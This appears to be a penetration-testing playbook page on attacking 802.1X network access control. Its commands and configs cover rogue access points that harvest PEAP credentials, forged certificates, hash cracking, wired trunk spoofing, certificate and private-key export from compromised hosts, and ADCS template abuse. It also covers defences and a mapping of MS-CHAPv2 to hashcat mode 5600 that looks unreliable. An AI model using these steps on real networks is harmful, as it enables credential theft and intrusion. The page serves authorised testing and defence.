802.1X Attacks

#Overview

IEEE 802.1X is a port-based network access control standard that requires devices to authenticate before gaining network access. It's the backbone of enterprise NAC (Network Access Control) and is used in both wired and wireless networks. The three components of 802.1X are:

Supplicant — The device requesting access (client)
Authenticator — The network device controlling access (switch or AP)
Authentication Server — The RADIUS server validating credentials (Cisco ISE, Aruba ClearPass, etc.)

802.1X attacks target the EAP (Extensible Authentication Protocol) layer, which carries authentication data between supplicant and server.

#EAP Type Decision Tree

802.1X Network Detected?
  |
  v
What EAP type is in use?
  |
  |-- EAP-MD5
  |     |-- Weak: MD5 challenge-response
  |     |-- Crack challenge/response with asleap or hashcat
  |
  |-- PEAP (MS-CHAPv2)
  |     |-- Downgrade to PEAP/GTC → cleartext credentials
  |     |-- Fake CA certificate → MS-CHAPv2 hash capture
  |     |-- See Method 1 and Method 2
  |
  |-- EAP-TTLS
  |     |-- Similar to PEAP attack surface
  |     |-- Tunnel can carry inner EAP methods
  |
  |-- EAP-TLS
  |     |-- Certificate-based (strongest)
  |     |-- Requires certificate theft or CA compromise
  |     |-- See Method 5
  |
  |-- EAP-FAST
  |     |-- PAC-based (Protected Access Credential)
  |     |-- PAC provisioning attack
  |     |-- See Method 4
  |
  |-- MAB (MAC Auth Bypass)
        |-- Not really 802.1X — uses MAC as identity
        |-- See [NAC Bypass](nac-bypass.md)

TEXT

#Method 1: EAP Downgrade (PEAP/GTC)

The most common 802.1X attack. PEAP normally uses MS-CHAPv2 inside a TLS tunnel. By downgrading the inner authentication to GTC (Generic Token Card), the server sends the username and password challenge in a way that can be captured or the client is prompted for cleartext credentials.

#EAP Downgrade with eaphammer

# Install eaphammer
git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer && ./kali-setup

# Set up evil twin with PEAP/GTC downgrade
sudo eaphammer --interface wlan0 \
  --essid "<Corporate-SSID>" \
  --channel <CH> \
  --auth peap \
  --wpa 2 \
  --captive-portal

# eaphammer will:
# 1. Broadcast a rogue AP with the target SSID
# 2. Downgrade PEAP/MS-CHAPv2 to PEAP/GTC
# 3. Capture credentials in cleartext or MS-CHAPv2 challenge-response
# 4. Log credentials to /tmp/eaphammer-*.log

BASH

#EAP Downgrade with hostapd-wpe

# Create hostapd-wpe configuration for PEAP/GTC downgrade
cat > /tmp/hostapd-wpe.conf << 'EOF'
interface=wlan0
driver=nl80211
ssid=<TARGET_SSID>
hw_mode=g
channel=<CH>
wpa=2
wpa_key_mgmt=WPA-EAP
rsn_pairwise=CCMP
ieee8021x=1
eap_server=1
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/ca.pem
server_cert=/etc/hostapd-wpe/server.pem
private_key=/etc/hostapd-wpe/server.key
private_key_passwd=password
dh_file=/etc/hostapd-wpe/dh.pem
EOF

# Start the rogue AP
sudo hostapd-wpe /tmp/hostapd-wpe.conf

# Monitor for captured credentials
tail -f /tmp/hostapd-wpe.log

BASH

#Capturing and Cracking MS-CHAPv2

# hostapd-wpe captures MS-CHAPv2 challenge/response
# The log contains: username, challenge, response

# Crack with asleap
asleap -C <challenge> -R <response> -W wordlist.txt

# Or convert to hashcat format
# hashcat mode 5500 = NetNTLMv1, mode 5600 = NetNTLMv2
# For MS-CHAPv2 (NetNTLMv2):
hashcat -m 5600 captured_hash.txt wordlist.txt

BASH

#Method 2: Certificate Trust Chain Attack

Many PEAP deployments don't properly validate the server certificate. If the client doesn't verify the CA, the attacker can present a self-signed certificate and capture the MS-CHAPv2 handshake.

#Detecting Certificate Validation

# Monitor EAP-TLS negotiation with tshark
tshark -r capture.pcap -Y "eap.code == 1 || eap.code == 2" \
  -T fields -e eap.type -e eap.identity

# Common EAP types:
# 1 = Identity
# 2 = Notification
# 3 = Nak (Legacy)
# 4 = MD5-Challenge
# 17 = EAP-TLS
# 21 = TTLS
# 25 = PEAP
# 43 = EAP-FAST

# If the client accepts ANY certificate, PEAP downgrade is trivial
# Check if the client validates the CA:
# 1. Set up rogue AP with self-signed certificate
# 2. If client connects, certificate validation is disabled

BASH

#Generating Rogue Certificates

# Generate a self-signed CA
openssl genrsa -out ca.key 2048
openssl req -new -x509 -days 365 -key ca.key -out ca.pem \
  -subj "/CN=<Corporate-CA>"

# Generate server certificate signed by our CA
openssl genrsa -out server.key 2048
openssl req -new -key server.key -out server.csr \
  -subj "/CN=<Corporate-SSID>"

openssl x509 -req -days 365 -in server.csr -CA ca.pem \
  -CAkey ca.key -CAcreateserial -out server.pem

# Generate DH parameters
openssl dhparam -out dh.pem 2048

# Use these certificates with hostapd-wpe or eaphammer

BASH

#Method 3: Wired 802.1X Bypass

Wired 802.1X can be bypassed using physical techniques that don't apply to wireless.

#Hub Insertion Attack

# Insert a hub between the wall port and the authenticated device
# This allows an attacker's device to share the authenticated port

# Physical setup:
# Wall Port → Hub → [Authenticated Device] + [Attacker Device]

# The authenticated device authenticates via 802.1X
# The hub passes all traffic through
# The attacker device can now see and send traffic on the authenticated port

# Limitations:
# - Some switches detect multiple MAC addresses on a port (port security)
# - The authenticated device must remain connected
# - The switch may enforce single-session 802.1X

BASH

#Switch Spoofing (Wired)

# Similar to VLAN hopping switch spoofing
# Send DTP frames to negotiate a trunk port
# This bypasses 802.1X on the original port and provides trunk access

sudo yersinia dtp -attack 1

# After trunk negotiation:
sudo vconfig add eth0 1
sudo vconfig add eth0 10
sudo ifconfig eth0.1 192.168.1.100/24 up

BASH

#802.1X Multi-Auth Bypass

# Some switch configurations allow multiple devices per port (multi-auth mode)
# If the port uses multi-auth instead of single-auth:
# 1. The first device authenticates with 802.1X
# 2. Additional devices can connect with different credentials or MAB

# Test by connecting a second device to the same port (via hub)
# If the second device is assigned to a different VLAN or gets MAB access,
# multi-auth is enabled

# Exploit: Use MAB bypass for the second device
# See [NAC Bypass](nac-bypass.md)

BASH

#Method 4: EAP-FAST PAC Provisioning Attack

EAP-FAST (Flexible Authentication via Secure Tunneling) uses Protected Access Credentials (PACs) for authentication. If anonymous PAC provisioning is enabled, an attacker can provision a PAC and authenticate.

# Check if EAP-FAST is in use
tshark -r capture.pcap -Y "eap.type == 43"

# EAP-FAST anonymous PAC provisioning attack:
# 1. Set up rogue AP with EAP-FAST
# 2. Client connects and requests PAC provisioning
# 3. Attacker provisions a malicious PAC
# 4. Client uses the malicious PAC for authentication

# With eaphammer:
sudo eaphammer --interface wlan0 \
  --essid "<Corporate-SSID>" \
  --channel <CH> \
  --auth fast \
  --wpa 2

BASH

#Method 5: EAP-TLS Certificate Theft

EAP-TLS requires both server and client certificates. This is the strongest 802.1X deployment, but it's vulnerable if client certificates can be stolen.

# EAP-TLS attack vectors:

# 1. Steal client certificate from a compromised device
# Windows: certutil -store My
# Linux: /etc/pki/tls/private/ or /etc/ssl/private/
# macOS: security find-identity -v -p basic

# 2. Export certificate with private key
# Windows: certutil -exportPFX My <thumbprint> exported.pfx
# Or via MMC → Certificates → Personal → Export

# 3. Use stolen certificate to authenticate
# Configure wpa_supplicant with the stolen cert:
cat > /tmp/wpa.conf << 'EOF'
network={
    ssid="<Corporate-SSID>"
    key_mgmt=WPA-EAP
    eap=TLS
    identity="<username>"
    client_cert="/tmp/client.pem"
    private_key="/tmp/client.key"
    private_key_passwd="<password>"
    ca_cert="/tmp/ca.pem"
}
EOF

sudo wpa_supplicant -i wlan0 -c /tmp/wpa.conf

BASH

#Method 6: Silver Certificate Attack (ADCS)

In Active Directory environments, 802.1X often uses certificates issued by ADCS (Active Directory Certificate Services). If an attacker can obtain a certificate template that allows authentication, they can bypass 802.1X.

# Using Certipy to find vulnerable certificate templates
certipy find -u <user>@<domain> -p <password> -dc-ip <DC_IP>

# Look for templates with:
# - Enrollment rights for low-privilege users
# - Client Authentication EKU
# - No manager approval required
# - No authorized signatures required

# Request a certificate for authentication
certipy req -u <user>@<domain> -p <password> \
  -ca <CA_NAME> -template <VULNERABLE_TEMPLATE> \
  -dc-ip <DC_IP>

# Use the certificate for 802.1X authentication
# See [06 - Exploitation & Foothold - ADCS](../../06-exploitation-foothold/active-directory/adcs-exploitation.md)

BASH

#EAP Type Reference

EAP Type	Authentication	Vulnerability	Difficulty
EAP-MD5	MD5 challenge-response	Weak hash, offline crack	Low
PEAP	Server cert + MS-CHAPv2	GTC downgrade, cert trust	Low-Medium
EAP-TTLS	Server cert + inner auth	Similar to PEAP	Low-Medium
EAP-TLS	Client + server cert	Certificate theft	High
EAP-FAST	PAC-based	PAC provisioning attack	Medium
LEAP	Cisco proprietary	Offline crack (asleap)	Low

#Detection and Defense

Defense	Effectiveness
Certificate pinning (validate CA)	Prevents GTC downgrade and self-signed cert attacks
802.11w (MFP)	Prevents deauth to force evil twin connection
Network segmentation (micro-segmentation)	Limits lateral movement after 802.1X bypass
Multi-factor NAC (802.1X + posture)	Requires both cert and compliant posture
Port security (single MAC per port)	Prevents hub insertion
Dynamic VLAN assignment	Limits access even after authentication bypass

#Common Pitfalls

Certificate validation: Most PEAP clients show certificate warnings but allow users to click through. Always test whether clients accept self-signed certificates.
EAP type negotiation: Clients may fall back to weaker EAP types. Test all supported EAP methods.
Wired vs wireless: Wired 802.1X has different bypass techniques (hub insertion, switch spoofing) that don't apply to wireless.
Guest networks: Many organizations have a separate guest SSID that bypasses 802.1X. This is often the easiest attack path.
MAB fallback: If the NAC policy falls back from 802.1X to MAB, the attacker only needs to spoof a MAC address.

#OPSEC Considerations

EAP downgrade attacks are visible in RADIUS logs (failed authentication, then successful GTC auth)
Rogue APs are detected by WIDS/WIPS (duplicate SSID, different BSSID)
Self-signed certificates may trigger client warnings that users report
MS-CHAPv2 hashes are logged by the authentication server
Hub insertion is physically detectable during security audits

#Cross-References

NAC Bypass — Network Access Control bypass techniques
MAC Filtering Bypass — MAC spoofing for MAB bypass
Evil Twin & Rogue AP — Setting up a rogue AP for PEAP attacks
01 - Pre-Foothold — Passive 802.1X inventory
ADCS Exploitation — Certificate-based attack paths

#Tool References

Tool	Purpose	Link
eaphammer	Enterprise evil twin, PEAP/GTC downgrade	https://github.com/s0lst1c3/eaphammer
hostapd-wpe	Rogue AP with credential logging	https://github.com/OpenSecurityResearch/hostapd-wpe
asleap	MS-CHAPv2 cracking	https://github.com/joswr1ght/asleap
hashcat	Hash cracking (NetNTLMv2)	https://hashcat.net/hashcat/
Certipy	ADCS enumeration and exploitation	https://github.com/ly4k/Certipy
yersinia	DTP/CDP spoofing (wired 802.1X bypass)	https://github.com/tomcarlos/yersinia